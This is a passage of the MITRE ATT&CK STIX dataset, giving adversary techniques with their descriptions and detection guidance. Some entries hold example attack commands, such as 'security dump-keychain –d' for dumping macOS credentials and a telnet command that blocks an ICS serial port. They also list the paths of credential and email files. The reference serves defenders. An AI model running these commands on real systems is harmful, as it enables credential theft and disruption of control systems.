locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nConsider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "created": "2020-03-13T21:13:10.467Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1074/001", "external_id": "T1074.001"}, {"source_name": "Prevailion DarkWatchman 2021", "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.", "url": "https://www.prevailion.com/darkwatchman-new-fileless-techniques/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:00.184Z", "name": "Block Serial COM", "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Operational Databases: Process/Event Alarm", "Network Traffic: Network Traffic Flow", "Operational Databases: Process History/Live Data", "Application Log: Application Log Content", "Process: Process Termination"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0805", "external_id": "T0805"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-14T21:12:48.409Z", "name": "Match Legitimate Name or Location", "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Yossi Weizman, Azure Defender Research Team", "Vishwas Manral, McAfee"], "x_mitre_deprecated": false, "x_mitre_detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nIn containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Containers"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "created": "2020-02-10T20:43:10.239Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/005", "external_id": "T1036.005"}, {"source_name": "Twitter ItsReallyNick Masquerading Update", "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457"}, {"source_name": "Docker Images", "description": "Docker. (n.d.). Docker Images. Retrieved April 6, 2021.", "url": "https://docs.docker.com/engine/reference/commandline/images/"}, {"source_name": "Elastic Masquerade Ball", "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.", "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-08T18:57:58.010Z", "name": "System Binary Proxy Execution", "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. (Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands. (Citation: split man page)(Citation: GTFO split)\n\nAdversaries may abuse application binaries installed on a system for proxy execution of malicious code or domain-specific commands. These commands could be used to target local resources on the device or networked devices within the environment through defined APIs ([Execution through API](https://attack.mitre.org/techniques/T0871)) or application-specific programming languages (e.g., MicroSCADA SCIL). Application binaries may be signed by the developer or generally trusted by the operators, analysts, and monitoring tools accustomed to the environment. These applications may be developed and/or directly provided by the device vendor to enable configuration, management, and operation of their devices without many alternatives. \n\nAdversaries may seek to target these trusted application binaries to execute or send commands without the development of custom malware. For example, adversaries may target a SCADA server binary which has the existing ability to send commands to substation devices, such as through IEC 104 command messages. Proxy execution may still require the development of custom tools to hook into the application binary\u2019s execution.\n\n", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Script: Script Execution", "Command: Command Execution", "Process: Process Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "created": "2024-03-25T20:16:15.016Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0894", "external_id": "T0894"}, {"source_name": "GTFO split", "description": "GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.", "url": "https://gtfobins.github.io/gtfobins/split/"}, {"source_name": "LOLBAS Project", "description": "Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.", "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria"}, {"source_name": "split man page", "description": "Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) \u2014 Linux manual page. Retrieved March 25, 2022.", "url": "https://man7.org/linux/man-pages/man1/split.1.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Domain Fronting", "description": "Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matt Kelly, @breakersall"], "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1ce03c65-5946-4ac9-9d4d-66db87e024bd", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1172", "external_id": "T1172"}, {"source_name": "Fifield Blocking Resistent Communication through domain fronting 2015", "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. Retrieved November 20, 2017.", "url": "http://www.icir.org/vern/papers/meek-PETS-2015.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Digital Certificates", "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", "created": "2020-10-01T01:42:24.974Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1587/003", "external_id": "T1587.003"}, {"source_name": "Splunk Kovar Certificates 2017", "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Stored Data Manipulation", "description": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Integrity"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "created": "2020-03-02T14:22:24.410Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1565/001", "external_id": "T1565.001"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}, {"source_name": "FireEye APT38 Oct 2018", "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", "url": "https://content.fireeye.com/apt/rpt-apt38"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-03-30T21:01:48.643Z", "name": "Password Cracking", "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) \n\nTechniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Mohamed Kmal"], "x_mitre_deprecated": false, "x_mitre_detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "Azure AD", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "created": "2020-02-11T18:38:56.197Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1110/002", "external_id": "T1110.002"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}, {"source_name": "Wikipedia Password cracking", "description": "Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.", "url": "https://en.wikipedia.org/wiki/Password_cracking"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "SID-History Injection", "description": "The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nAdversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Vincent Le Toux", "Alain Homewood, Insomnia Security"], "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser Cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015)\n\nMonitor Account Management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1df0326d-2fbc-4d08-a16b-48365f1e742d", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1178", "external_id": "T1178"}, {"source_name": "Microsoft SID", "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx"}, {"source_name": "Microsoft SID-History Attribute", "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.", "url": "https://msdn.microsoft.com/library/ms679833.aspx"}, {"source_name": "Microsoft Well Known SIDs Jun 2017", "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.", "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems"}, {"source_name": "Microsoft Get-ADUser", "description": "Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.", "url": "https://technet.microsoft.com/library/ee617241.aspx"}, {"source_name": "AdSecurity SID History Sept 2015", "description": "Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.", "url": "https://adsecurity.org/?p=1772"}, {"source_name": "Microsoft DsAddSidHistory", "description": "Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.", "url": "https://msdn.microsoft.com/library/ms677982.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Local Email Collection", "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", "created": "2020-02-19T18:46:06.098Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1114/001", "external_id": "T1114.001"}, {"source_name": "Outlook File Sizes", "description": "N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.", "url": "https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/"}, {"source_name": "Microsoft Outlook Files", "description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.", "url": "https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Keychain", "description": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple\u2019s iCloud service. \n\nKeychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)\n\nAdversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain \u2013d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user\u2019s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", "created": "2020-02-12T18:55:24.728Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1555/001", "external_id": "T1555.001"}, {"source_name": "External to DA, the OS X Way", "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way"}, {"source_name": "Keychain Services Apple", "description": "Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.", "url": "https://developer.apple.com/documentation/security/keychain_services"}, {"source_name": "Empire Keychain Decrypt", "description": "Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.", "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py"}, {"source_name": "OSX Keychain Schaumann", "description": "Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.", "url": "https://www.netmeister.org/blog/keychain-passwords.html"}, {"source_name": "Keychain Decryption Passware", "description": "Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.", "url": "https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-16T12:26:07.945Z", "name": "Boot or Logon Autostart Execution", "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", 